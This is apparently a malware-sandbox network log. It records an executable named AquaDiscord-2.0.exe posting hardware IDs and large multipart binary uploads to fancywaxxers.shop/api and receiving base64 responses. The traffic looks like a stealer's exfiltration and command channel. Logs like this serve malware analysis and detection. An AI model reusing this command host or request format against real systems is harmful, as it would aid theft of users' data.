                                                                                        2024-12-30 19:40:08 UTC15331OUTData Raw: 2d 2d 51 48 57 55 49 39 58 34 4e 58 46 51 31 41 50 37 44 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 33 30 33 38 30 39 32 36 39 43 41 43 42 43 38 32 41 38 31 34 38 43 36 45 35 34 34 30 30 0d 0a 2d 2d 51 48 57 55 49 39 58 34 4e 58 46 51 31 41 50 37 44 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 48 57 55 49 39 58 34 4e 58 46 51 31 41 50 37 44 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38
                                                                                        Data Ascii: --QHWUI9X4NXFQ1AP7DFContent-Disposition: form-data; name="hwid"A0C303809269CACBC82A8148C6E54400--QHWUI9X4NXFQ1AP7DFContent-Disposition: form-data; name="pid"1--QHWUI9X4NXFQ1AP7DFContent-Disposition: form-data; name="lid"yau6Na--89908
                                                                                        2024-12-30 19:40:08 UTC15331OUTData Raw: a2 fd 9c 85 51 8c af b3 8f c7 9f 86 1f 2a ea 79 d9 e5 fb ab af d8 7d a6 23 be 02 03 52 cc 09 80 6f 83 67 31 0f bf b1 f3 28 df 6c c4 e1 6f b0 38 e3 f2 ff 19 01 e4 21 15 78 e4 b7 21 b8 1f c4 19 52 73 fd 00 33 97 0f 9c 86 03 22 43 70 dc a3 b2 b5 0e 7e 33 fb 31 1b 8a 21 2b c5 bc 28 5f fa ec 5a ca ef bc a9 96 11 08 da cb b7 e7 ac f5 81 d6 b6 4b de cf e3 bc 9e 57 8b 78 7a e0 08 6d e2 cd d1 1a 0d 5c 8e 7b 4d b2 5a fe e5 1f f8 81 30 49 74 eb 7d 0a 73 91 3d f3 e5 af 6d ed 58 4a 79 9c 82 79 de 37 dc 19 cd f4 46 1f 65 d0 f9 84 1e f8 5e b9 56 49 24 8c 6d e6 bc bb 34 68 d5 b4 93 df 83 a6 9c 0c 31 49 59 be da be f8 b7 18 8e 48 50 bd 89 58 98 90 b8 ad 19 3d 6a 2a 97 d5 1f 86 c8 9b 5c be 0e b6 39 df 2d ed bf ca 57 f7 f1 e7 80 a4 a5 11 e6 c4 69 e7 5d 4f 52 51 ff a1 d8 ba
                                                                                        Data Ascii: Q*y}#Rog1(lo8!x!Rs3"Cp~31!+(_ZKWxzm\{MZ0It}s=mXJyy7Fe^VI$m4h1IYHPX=j*\9-Wi]ORQ
                                                                                        2024-12-30 19:40:08 UTC15331OUTData Raw: 94 92 5b dd 55 55 ee 1e fd ac 78 5c 46 d3 65 d3 f8 a3 36 36 f0 72 61 77 70 12 3e d8 4b b4 dc e1 2b bd fe ab ff f5 b7 36 55 ee 11 35 35 85 92 60 a8 38 c4 14 62 cc e6 e2 c1 b6 1d ff 6a b1 d4 ba 08 c4 20 fd 77 e4 fa fc 4b 90 34 f3 df 21 d6 b9 d9 1a de 80 46 42 02 88 53 e4 ff 6b d0 b4 54 7f 9f a8 09 44 c0 61 0c ef e4 9e dd 7d 40 7a 3f 4d 15 81 e3 eb d7 f7 c9 36 ca 24 43 d5 ab 3b eb fa e5 2a a5 c0 62 e3 0d c8 57 f4 59 fa 71 35 d1 f6 8f e8 2b d9 f7 79 7b fe 02 8a 60 5c 3d e1 e7 f1 3f 6d 05 91 75 c8 81 16 6f fd 41 90 82 cb 8c f1 e9 51 88 16 8e 0e 80 8f 2d a8 14 71 e4 d7 75 35 3c 71 57 0d 98 84 dd 84 07 9c 20 22 f8 30 15 f1 9a 54 a0 e5 91 bb b7 41 67 4b fe 14 a9 78 be 76 0d 5f 6a 92 de 93 8a 18 29 21 73 99 b0 12 b0 77 80 45 4c dc 47 f2 e6 14 30 23 90 40 f6 ea f1
                                                                                        Data Ascii: [UUx\Fe66rawp>K+6U55`8bj wK4!FBSkTDa}@z?M6$C;*bWYq5+y{`\=?muoAQ-qu5<qW "0TAgKxv_j)!swELG0#@
                                                                                        2024-12-30 19:40:08 UTC15331OUTData Raw: ef be 45 bf 44 33 41 20 7a f7 7f 3e 78 2f cb fe 5c d9 fe b1 b2 e2 65 4d 26 12 87 08 b7 d0 b7 8f 93 6f e4 a6 01 ba 1a 91 4a 43 93 f9 51 bc 4a c0 03 8b 5d 3f a6 61 a9 82 77 ca 31 c1 82 a7 50 38 e2 00 d7 f0 e0 20 ce a3 44 e5 c5 2c fb a1 c9 47 1e d8 79 f2 ed 9b d7 7f e8 ba 59 ce 0f a1 47 3a 2f ce 01 e2 15 88 a8 30 94 8f 02 ae 6d 05 4f 9e c0 a5 a0 5e ff bf 53 6b 6d 2e 58 ab b7 ef d7 1b b4 ed c2 f5 eb b1 c8 3b b3 d5 be bc 66 c5 a7 dc aa bd 30 5e bc 2b f2 0b c5 59 a2 7e 96 5e 0d 01 89 38 c8 6d 72 ef ba 15 4f 80 3c 70 fe 3e 47 8a a8 c1 0d c5 95 a2 76 e5 ed d2 c3 7e 97 10 78 8d a6 77 0a 90 75 59 ea 2b 42 16 b5 a4 54 51 9c 08 78 23 aa 6e 09 32 1b 42 5c 01 61 a8 60 6e 58 4e 6c a4 5a eb 19 43 5f 48 fd 9f 88 17 87 48 2d 00 b3 88 66 c7 e9 a1 76 82 83 8b 3f dd d3 d1 eb
                                                                                        Data Ascii: ED3A z>x/\eM&oJCQJ]?aw1P8 D,GyYG:/0mO^Skm.X;f0^+Y~^8mrO<p>Gv~xwuY+BTQx#n2B\a`nXNlZC_HH-fv?
                                                                                        2024-12-30 19:40:08 UTC15331OUTData Raw: e9 72 70 2c b0 08 b8 13 e9 25 1a 9a dc a4 cc 64 c4 34 b2 4a 1e b8 cc 97 5f 7a 20 c1 29 04 f5 8f 60 22 be 79 44 08 65 5c c1 01 1c 02 cf 5e 09 cc ea 73 2b 02 81 d0 46 68 21 c3 1f 06 f5 43 23 23 03 e1 30 bf 75 8d 5e 7e 86 45 53 63 20 dd 9c f6 fb 04 d9 f4 e8 f1 f0 8c 08 ed 0a ae 8a 37 42 61 f5 ad 92 35 d9 2a e0 cc a4 3c 44 74 e3 5b 1e 40 e2 11 81 d2 b7 7c 4d fc 35 0c db 22 35 d7 2a 7d 6e 92 26 9a 0f 48 0a 4f 38 19 eb 73 a7 30 67 26 2f ee 5f cf 1d 52 c7 0c 07 3e 1a 1c 0e 3e b6 a0 dc 5d c4 68 d5 16 b3 d3 96 6a 5e 08 66 5c 3b 4e 16 5b 7f ad 69 3b 2c df ba 28 69 5f 1f a6 21 da 56 ce 09 e3 a6 08 0a 8c 04 61 40 30 06 c6 d8 06 fd bb 04 e8 23 0b 46 62 c0 36 9a 56 75 ae d8 29 06 13 8e 48 b7 08 d1 f7 b2 6b a6 7e 12 1a 97 2a 78 9d f3 36 1e 6d 7f 5e 80 b9 2a 7c d0 2e 54
                                                                                        Data Ascii: rp,%d4J_z )`"yDe\^s+Fh!C##0u^~ESc 7Ba5*<Dt[@|M5"5*}n&HO8s0g&/_R>>]hj^f\;N[i;,(i_!Va@0#Fb6Vu)Hk~*x6m^*|.T
                                                                                        2024-12-30 19:40:08 UTC15331OUTData Raw: 54 72 6d d6 a3 5e 5a 04 4a 8e c5 5d 06 57 47 13 51 ad a4 8b a7 27 b3 34 f0 d0 5c cc b8 75 6e 5d 04 cf 25 2c 85 ad 75 81 6e 0e 21 e1 19 c9 8f af c4 fb 22 a9 06 08 ac 91 8a 5f b7 0c 99 5f 5d d6 2d 18 43 4a 20 42 b5 9f 4f 80 18 ee e9 82 4c d2 79 18 f9 7c 17 0e 76 79 54 0f 98 a9 f8 c8 f2 76 93 83 a4 73 80 fd 7e b6 38 6b 09 a4 b6 51 2a d6 02 67 c1 69 30 e5 ae 28 06 34 af 98 52 77 c0 c6 a0 56 66 e5 c0 03 e5 bb 9b 03 ba 18 22 aa 42 4d c6 3d af 17 61 b2 29 63 ac 5b 65 67 81 fc 1f 14 30 27 6d 5a d3 46 0a da 77 1d e1 41 9b 83 12 2a 21 da 84 a1 39 0e 18 c6 c3 2d 48 60 f9 08 ee 12 05 bb cb 96 85 e9 ed c6 bd e2 a0 6c f3 f6 de 00 14 d0 60 3f d1 44 54 16 6a 15 11 a2 e7 74 4a 32 a0 be 83 e3 c5 aa e0 34 c3 fd c3 c6 fa 61 c7 c1 8d a6 0f 29 87 c7 d9 8f 2a 53 54 94 a9 59 06
                                                                                        Data Ascii: Trm^ZJ]WGQ'4\un]%,un!"__]-CJ BOLy|vyTvs~8kQ*gi0(4RwVf"BM=a)c[eg0'mZFwA*!9-H`l`?DTjtJ24a)*STY
                                                                                        2024-12-30 19:40:08 UTC15331OUTData Raw: d9 a2 43 6f a5 81 6f 7a b5 25 6c 49 6a 3d 20 c8 f1 42 14 fc 5c 1c 2d 07 55 6b f4 36 4b 2a 6e 67 7a d3 62 8b 2c fc 68 c2 05 a6 b4 61 9b 22 b8 83 92 e0 d0 dc 43 40 ba 39 35 6d f7 f4 ad cb 75 c7 15 65 ca 1b 75 35 40 37 4f 10 7e e7 31 7a 1a 4d 7f bb 31 6a 99 db df 3b c6 ff dd 16 fa a2 4e b8 ce 19 22 33 b2 02 f8 ef 99 1b f6 23 49 8b fc 7c 1f 61 fa bc 75 f8 9e 82 21 ee 5f 38 de 71 5d c0 8e 51 46 fc 84 f8 54 af 20 db 16 b0 bf cb 12 81 46 47 ee 1e 12 3f e3 30 57 9a d5 a5 86 aa a1 b4 40 7d f2 e0 d0 47 5c d2 41 2f 43 ed 1e c5 3e c7 b2 1d a1 67 64 49 7d 13 b8 f4 3a dd ce af 9c a1 f2 83 91 48 cb 31 4c d5 03 d2 73 d6 4f ab 2b 0d a4 69 5c fe 76 8d e1 11 24 93 44 61 85 7b 20 b4 9b a8 10 8a 88 02 27 06 c5 6e dd b5 18 3f 2a 72 48 fc e8 ea b3 f9 86 50 05 92 57 93 76 89 09
                                                                                        Data Ascii: Cooz%lIj= B\-Uk6K*ngzb,ha"C@95mueu5@7O~1zM1j;N"3#I|au!_8q]QFT FG?0W@}G\A/C>gdI}:H1LsO+i\v$Da{ 'n?*rHPWv
                                                                                        2024-12-30 19:40:08 UTC15331OUTData Raw: 99 3a 28 05 a9 cc 30 57 5c 6a bf a0 a7 af a2 a8 72 5f f9 19 d2 06 d9 67 30 1c 23 a3 db 7f 22 8c 5e eb fa c8 6c 27 83 28 00 ca 4b c7 cb cb 0d bc e2 00 3e 78 41 bb 3e 5c da d1 8f 33 95 71 19 10 fa fd 82 d3 dd 8c 3f eb b6 d7 b5 1b 15 af 67 a8 70 65 ce 91 f4 b7 ec 2d 17 b5 ae d2 b8 c1 1f 82 45 b7 5a b9 7c e7 d8 da 31 73 48 4a 66 a5 ca a6 3d 3b 7d d2 d6 fb 2a d0 a7 a5 1f cd 68 0d cd a7 a9 73 13 82 77 a5 4f d9 c0 71 f0 df 94 fe 6f 3d 83 37 0d 01 a1 00 ea c1 4b 1a db 70 84 83 9d bf ad 8d 7f a0 67 07 6d bc 2e 08 da 1a 3b c9 a9 62 1e dc 41 3e 96 df c5 e6 f4 1a 0b c4 28 65 0e be 97 03 5a 47 68 d7 3f a7 e5 2a b6 dc 0e d0 7e 1c fe f9 8e f1 2d 2d 30 5d 12 d5 80 a8 f4 3e 71 24 08 13 65 2d 00 6e a1 d0 bc 4b a7 9c 09 93 a2 c3 ae 52 32 bb ea f2 bd ba a5 fe 26 79 4a 8d 09
                                                                                        Data Ascii: :(0W\jr_g0#"^l'(K>xA>\3q?gpe-EZ|1sHJf=;}*hswOqo=7Kpgm.;bA>(eZGh?*~--0]>q$e-nKR2&yJ
                                                                                        2024-12-30 19:40:08 UTC15331OUTData Raw: c3 3a b7 96 8c 80 2f ac 66 01 fc bc a5 02 4d 55 17 01 b1 cf fa 02 9e 8a 28 75 a9 40 68 ec 79 c7 aa 97 c5 1d 36 84 eb 5b 88 7b 0e 72 c7 7c 41 bd 3a a3 6f 21 66 3d 0c a6 c1 a1 17 16 c3 55 fa e0 c3 b2 2d 13 54 2a 76 d6 9f 86 0a c3 41 92 a8 f3 ab 95 3a 47 c2 64 b6 46 03 cb 06 b8 35 ba 23 89 84 8e 36 c4 a5 de 42 3f be 8b 42 20 a9 cd a4 f1 f6 ba b1 53 53 60 aa cc 9e 62 94 d9 3d 0b e1 0d 89 d5 bd d2 ef 0a 88 5e a2 c2 5a 56 7d 61 51 61 93 b8 77 e6 6d 98 23 6e 5a 57 30 e7 a1 d8 c5 2b 2e 11 c6 bc 2a fd 6e 96 5e a6 a3 b9 04 7f 6e 3f 8c f0 98 4e 8e 67 74 d7 6f d6 ee 9d e0 39 76 c5 54 18 15 4a 5d 9f 19 a2 ef 86 95 66 79 75 4a b1 65 e9 d3 6e da 19 00 47 85 99 ad 79 c3 d7 f5 26 b2 03 e2 37 ad 74 db b3 19 52 9c ab 06 d4 6b 6d 84 ae 1e b6 c7 51 ac ae c2 65 55 3d 70 49 bb
                                                                                        Data Ascii: :/fMU(u@hy6[{r|A:o!f=U-T*vA:GdF5#6B?B SS`b=^ZV}aQawm#nZW0+.*n^n?Ngto9vTJ]fyuJenGy&7tRkmQeU=pI
                                                                                        2024-12-30 19:40:08 UTC15331OUTData Raw: af 77 7d 23 51 eb af e6 d6 db f3 01 1d d1 82 6f 8c 97 07 47 e4 c0 3b 19 3d 24 78 da 27 9a 6e 1e f2 63 bb 65 7f b2 c9 d5 ad 1f cf 84 35 c0 c9 75 3b 75 fe cf 00 c7 d5 4a 58 22 ae 90 17 e8 ac dd f6 ba 75 d7 f9 28 f5 07 12 ed 57 7b eb 5d 92 1c f8 2d 77 4a 17 f7 bc 4e 1c c2 71 55 02 aa a4 6f 7e 54 49 78 8b 21 da d6 a0 b0 83 ca bb d1 c7 f6 1a c1 8e 90 6c 15 38 5c 7f 3d 2d cc 4d a5 71 b7 09 ef e9 d1 77 9d f8 bc a8 a1 98 f9 ab 66 69 1d e2 b7 88 42 9f 1d a8 5d c9 a1 03 77 e4 36 ec af ad 7d 14 c1 73 5f d0 45 69 18 c3 43 82 4a 8a 09 96 d9 82 af 8f 6a 7d 8a 7e b3 c9 3e 52 ec 01 65 3b 79 a9 4b 7b 51 29 2e d8 b9 f1 62 e1 bb ce cd 91 bc 2c 0c c7 cd 4c 7a 1a 03 e1 e6 5c 9b b1 e3 6b 6f 6b a2 8f 60 f5 5b b9 9d 4e 06 8a 6b b5 71 a4 2a 3e 7c 62 b0 86 5e 9b d8 1c 8d 30 6c f2
                                                                                        Data Ascii: w}#QoG;=$x'nce5u;uJX"u(W{]-wJNqUo~TIx!l8\=-MqwfiB]w6}s_EiCJj}~>Re;yK{Q).b,Lz\kok`[Nkq*>|b^0l
                                                                                        2024-12-30 19:40:12 UTC1137INHTTP/1.1 200 OK
                                                                                        Date: Mon, 30 Dec 2024 19:40:12 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=r7791e1ojn3ggnmhjdrm5ovgdb; expires=Fri, 25 Apr 2025 13:26:49 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2YH2AdJwncy1jMKO1M1f31H%2FQT83qy6qiJaWBjinwVPvi562fKjyawl%2FN6as1h34vUptAalxGHCrbVfSFSLam7LoW03vvf5vSLMmO1RMGtmOcalLhQ9cRNzJUJjMqqw%2BGSX1mA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fa47ffb2df41899-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1567&rtt_var=857&sent=201&recv=586&lost=0&retrans=0&sent_bytes=2843&recv_bytes=571480&delivery_rate=1103552&cwnd=153&unsent_bytes=0&cid=6b4bb8b8f1ae5756&ts=3519&x=0"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.449737104.21.16.14437400C:\Users\user\Desktop\AquaDiscord-2.0.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-30 19:40:12 UTC265OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 86
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-30 19:40:12 UTC86OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 26 6a 3d 26 68 77 69 64 3d 41 30 43 33 30 33 38 30 39 32 36 39 43 41 43 42 43 38 32 41 38 31 34 38 43 36 45 35 34 34 30 30
                                                                                        Data Ascii: act=get_message&ver=4.0&lid=yau6Na--899083440&j=&hwid=A0C303809269CACBC82A8148C6E54400
                                                                                        2024-12-30 19:40:13 UTC1133INHTTP/1.1 200 OK
                                                                                        Date: Mon, 30 Dec 2024 19:40:13 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=qfcael3jg0sveu95qtt5oh46vf; expires=Fri, 25 Apr 2025 13:26:52 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2T%2BcCqCmaKpDEAMf2edZEP6WjJ4cx6rHRs0P85Eon%2BtCLJDBq8BcZMHFvjz3qwI0Ot4czzqyxDlMpmP0A7jgbOctzwZe5atVQwBAx1Df1r0dw88gJOGrxsjmQ%2FGADit8v4nR%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fa4801478d20fa8-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=13528&min_rtt=1524&rtt_var=7812&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=987&delivery_rate=1916010&cwnd=252&unsent_bytes=0&cid=0ca75c599880d7f1&ts=471&x=0"
                                                                                        2024-12-30 19:40:13 UTC236INData Raw: 33 36 34 38 0d 0a 70 51 75 4b 41 71 51 72 38 75 54 74 7a 33 66 4a 47 4f 38 68 56 75 73 39 70 77 36 70 57 4b 4f 6b 2b 77 68 77 4b 37 61 2b 43 5a 58 2b 63 4b 68 6b 30 41 6e 49 31 63 48 74 45 75 73 69 33 67 31 30 6a 78 2b 64 4c 50 4d 52 31 2b 32 4a 61 6b 4a 54 35 64 4d 35 32 73 6f 39 2b 6b 61 57 58 6f 4b 56 31 61 59 52 6e 31 65 75 55 78 36 2b 54 35 64 36 32 52 54 68 31 49 4a 4c 43 6d 62 69 32 31 6a 6c 6c 56 2f 4a 64 74 4a 6e 74 4b 2b 50 6e 67 61 6a 61 59 52 78 4e 39 31 51 31 58 66 6a 59 66 61 51 75 48 73 55 65 4d 44 74 4f 76 37 57 54 4f 52 4c 36 47 61 4b 71 74 69 49 4a 49 56 4c 70 42 4e 76 6d 47 6a 58 65 75 30 70 37 4e 57 71 4d 51 4a 61 31 38 68 41 2b 35 52 66 37 55 6e 63 47 72 6e 64 6f 61 34 6b 76 6e
                                                                                        Data Ascii: 3648pQuKAqQr8uTtz3fJGO8hVus9pw6pWKOk+whwK7a+CZX+cKhk0AnI1cHtEusi3g10jx+dLPMR1+2JakJT5dM52so9+kaWXoKV1aYRn1euUx6+T5d62RTh1IJLCmbi21jllV/JdtJntK+PngajaYRxN91Q1XfjYfaQuHsUeMDtOv7WTORL6GaKqtiIJIVLpBNvmGjXeu0p7NWqMQJa18hA+5Rf7UncGrndoa4kvn
                                                                                        2024-12-30 19:40:13 UTC1369INData Raw: 6d 4d 53 51 4f 52 65 4a 52 6c 79 43 6a 33 33 5a 51 2f 51 47 33 6e 69 45 6a 6a 34 6a 33 35 55 75 49 54 67 63 2b 41 70 45 47 6b 58 36 64 51 5a 37 74 5a 31 32 6a 52 50 4a 4c 75 69 6a 68 43 51 76 2b 4b 65 73 54 55 63 76 68 4c 79 6b 69 2f 75 4d 4b 4f 44 76 35 54 6c 32 59 5a 6a 6b 33 7a 59 50 6f 4c 30 64 53 59 61 6c 74 48 68 4d 68 61 70 70 55 79 33 57 7a 74 63 72 2f 56 70 2f 6f 78 6a 58 4b 6d 62 43 66 53 54 76 4a 2b 33 52 7a 53 36 34 70 5a 43 6c 6e 48 33 30 66 59 31 6a 72 4f 57 2b 39 54 77 71 2f 55 67 78 61 61 4c 6f 35 43 4d 5a 68 48 34 6a 33 43 41 75 6e 51 73 6e 6f 53 47 64 37 74 5a 4b 58 71 5a 4c 78 79 34 42 6d 48 6c 4a 7a 37 48 71 39 65 6f 47 41 6b 6f 32 6a 72 50 74 30 33 30 65 61 4c 63 54 4e 52 2b 2b 70 73 78 38 78 69 75 6d 76 51 58 5a 43 69 70 71 30 6d 2f
                                                                                        Data Ascii: mMSQOReJRlyCj33ZQ/QG3niEjj4j35UuITgc+ApEGkX6dQZ7tZ12jRPJLuijhCQv+KesTUcvhLyki/uMKODv5Tl2YZjk3zYPoL0dSYaltHhMhappUy3Wztcr/Vp/oxjXKmbCfSTvJ+3RzS64pZClnH30fY1jrOW+9Twq/UgxaaLo5CMZhH4j3CAunQsnoSGd7tZKXqZLxy4BmHlJz7Hq9eoGAko2jrPt030eaLcTNR++psx8xiumvQXZCipq0m/
                                                                                        2024-12-30 19:40:13 UTC1369INData Raw: 33 69 46 72 55 64 4f 78 72 79 50 36 79 66 44 6c 5a 31 49 78 78 78 73 67 37 78 57 32 53 57 37 62 57 6d 4c 38 47 38 58 47 4a 64 78 6d 71 54 2b 39 62 32 32 6a 58 31 4c 64 4b 41 46 4c 31 78 45 54 42 77 46 6e 68 61 35 52 43 68 70 4b 50 69 54 79 72 53 64 6c 4c 4a 34 42 74 78 6a 6a 45 4b 74 72 75 77 6c 31 45 61 4d 58 61 57 75 50 32 4f 65 46 78 34 30 57 37 71 4b 43 33 4f 66 78 66 76 47 30 46 6f 41 2b 65 66 66 77 6f 31 2b 43 4b 52 77 46 36 6a 38 78 34 39 4e 4e 43 35 44 50 77 54 4c 6d 63 33 49 52 4f 68 58 6d 38 56 6a 65 49 57 74 52 30 37 47 76 49 2f 72 4a 38 4f 56 6e 55 6a 48 48 47 79 44 76 46 62 5a 4a 62 74 74 61 59 76 77 62 78 63 59 6c 33 47 61 70 50 37 31 76 62 61 4e 66 55 74 30 6f 41 55 76 58 45 52 4d 48 41 57 65 46 72 6c 45 4b 47 6b 6f 2b 4a 50 4b 74 4a 32 55
                                                                                        Data Ascii: 3iFrUdOxryP6yfDlZ1Ixxxsg7xW2SW7bWmL8G8XGJdxmqT+9b22jX1LdKAFL1xETBwFnha5RChpKPiTyrSdlLJ4BtxjjEKtruwl1EaMXaWuP2OeFx40W7qKC3OfxfvG0FoA+effwo1+CKRwF6j8x49NNC5DPwTLmc3IROhXm8VjeIWtR07GvI/rJ8OVnUjHHGyDvFbZJbttaYvwbxcYl3GapP71vbaNfUt0oAUvXERMHAWeFrlEKGko+JPKtJ2U
                                                                                        2024-12-30 19:40:13 UTC1369INData Raw: 6e 6b 4c 36 50 4f 33 75 69 54 73 47 65 65 2f 6e 52 39 75 57 57 4c 6c 58 79 30 6d 30 68 6f 43 69 4d 66 41 73 32 6d 30 6b 70 6d 2f 4c 58 50 34 7a 30 64 43 75 65 79 67 5a 68 49 68 38 7a 65 6c 37 35 31 48 4d 57 49 69 58 68 62 6b 48 73 47 36 4d 53 6a 53 42 64 74 35 71 33 68 33 4c 77 38 78 2f 48 47 33 54 31 58 50 67 34 33 48 34 61 2f 41 65 75 35 65 63 35 43 76 6d 54 4e 70 34 5a 61 49 4f 30 30 62 49 43 2f 58 47 6a 46 42 45 41 4f 58 72 53 2f 7a 50 51 4f 5a 55 30 6d 69 6b 69 71 62 2f 52 62 78 61 6e 56 63 76 32 47 75 58 55 6f 5a 6f 39 64 53 72 5a 42 74 64 77 75 73 78 78 4a 59 2b 75 55 6a 33 52 4a 6a 64 69 37 73 39 68 57 43 6f 5a 77 58 54 64 2f 56 57 77 57 76 61 77 70 64 48 4d 6c 72 65 38 45 66 6d 34 58 71 38 58 6f 74 66 69 36 65 58 67 69 4f 73 53 61 78 69 45 72 68
                                                                                        Data Ascii: nkL6PO3uiTsGee/nR9uWWLlXy0m0hoCiMfAs2m0kpm/LXP4z0dCueygZhIh8zel751HMWIiXhbkHsG6MSjSBdt5q3h3Lw8x/HG3T1XPg43H4a/Aeu5ec5CvmTNp4ZaIO00bIC/XGjFBEAOXrS/zPQOZU0mikiqb/RbxanVcv2GuXUoZo9dSrZBtdwusxxJY+uUj3RJjdi7s9hWCoZwXTd/VWwWvawpdHMlre8Efm4Xq8Xotfi6eXgiOsSaxiErh
                                                                                        2024-12-30 19:40:13 UTC1369INData Raw: 53 76 77 30 72 49 37 41 78 2f 73 30 58 47 73 79 32 50 4a 59 2b 55 65 67 64 79 4f 74 52 36 4d 4b 34 52 41 4c 4a 4e 32 33 6e 54 42 49 50 48 42 6c 55 51 66 57 73 62 36 58 73 62 4e 5a 4f 77 79 6e 56 71 42 68 39 79 4b 47 5a 4d 70 6f 32 74 6d 32 6b 66 66 50 4a 46 6f 32 63 32 74 5a 54 4a 4d 67 75 31 48 30 50 46 42 35 55 47 54 62 62 6d 47 6d 34 35 43 6d 6e 4f 4d 63 44 4f 52 5a 63 38 36 2b 77 6e 51 79 5a 4d 77 42 6c 4c 42 35 32 58 59 31 58 2b 2f 53 76 64 75 74 72 4f 36 74 6a 57 6e 61 36 4e 49 5a 37 4e 62 6e 6a 2b 52 49 50 6e 38 6f 58 4a 44 66 39 48 31 57 76 33 74 53 66 70 4e 35 33 36 72 76 4b 47 2b 4f 76 35 52 6a 52 49 30 6f 58 54 56 62 4a 6b 58 30 4e 53 33 63 43 68 70 35 59 39 44 78 2f 4a 64 7a 56 62 56 55 61 71 4a 6c 4b 63 35 68 32 75 72 55 47 43 33 45 74 4e 33
                                                                                        Data Ascii: Svw0rI7Ax/s0XGsy2PJY+UegdyOtR6MK4RALJN23nTBIPHBlUQfWsb6XsbNZOwynVqBh9yKGZMpo2tm2kffPJFo2c2tZTJMgu1H0PFB5UGTbbmGm45CmnOMcDORZc86+wnQyZMwBlLB52XY1X+/SvdutrO6tjWna6NIZ7Nbnj+RIPn8oXJDf9H1Wv3tSfpN536rvKG+Ov5RjRI0oXTVbJkX0NS3cChp5Y9Dx/JdzVbVUaqJlKc5h2urUGC3EtN3
                                                                                        2024-12-30 19:40:13 UTC1369INData Raw: 53 6f 57 53 5a 48 34 2b 49 6d 7a 2b 35 34 37 44 50 77 62 74 6e 56 70 61 34 6b 72 6c 7a 58 51 69 79 43 65 4a 52 6c 36 44 2f 45 6c 4a 4e 36 57 31 50 4f 79 55 6a 59 6c 47 66 57 4c 65 56 68 78 64 43 49 2f 51 2b 51 54 72 64 4d 4c 34 4e 7a 36 58 33 74 4b 5a 58 34 31 48 77 4a 61 4d 7a 7a 58 66 44 30 53 4d 6c 47 39 31 6e 45 68 71 57 48 4f 35 68 69 75 48 6c 75 33 47 72 66 53 74 67 30 78 38 37 4a 63 54 51 54 30 75 31 5a 34 4d 68 6b 76 31 62 56 54 6f 71 69 6f 76 34 77 2f 47 75 6d 53 78 32 75 43 63 52 62 38 54 72 69 79 35 68 5a 49 56 2f 45 7a 32 6a 6a 6c 47 48 49 54 75 46 4f 78 74 58 65 2b 30 61 61 4b 61 5a 47 47 74 78 75 36 6a 6e 6a 4e 74 50 38 6f 30 6f 71 66 65 4c 61 66 64 2f 70 63 38 46 53 2f 6b 57 75 79 34 43 41 52 4a 6f 76 67 52 49 5a 71 55 7a 50 4f 65 63 64 31
